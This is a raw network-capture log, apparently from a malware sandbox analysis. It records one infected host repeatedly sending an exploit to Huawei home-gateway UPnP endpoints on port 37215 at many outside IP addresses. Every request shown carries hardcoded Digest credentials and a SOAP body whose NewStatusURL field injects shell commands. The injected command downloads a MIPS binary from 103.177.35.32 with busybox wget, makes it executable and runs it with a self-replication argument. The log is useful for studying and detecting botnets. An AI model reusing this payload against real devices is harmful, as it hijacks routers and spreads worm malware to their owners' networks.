                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3180192.168.2.233743241.206.145.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660464048 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3181192.168.2.2340612197.246.207.12237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660468102 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3182192.168.2.2342192197.174.122.13437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660537958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3183192.168.2.2337838197.24.47.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660541058 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3184192.168.2.2348564157.72.171.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660545111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3185192.168.2.2353854151.79.165.1037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660548925 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3186192.168.2.2341124197.100.248.16137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660568953 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3187192.168.2.236069241.177.189.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660578012 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3188192.168.2.235026441.67.235.8237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660583973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3189192.168.2.2338094211.48.64.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660592079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
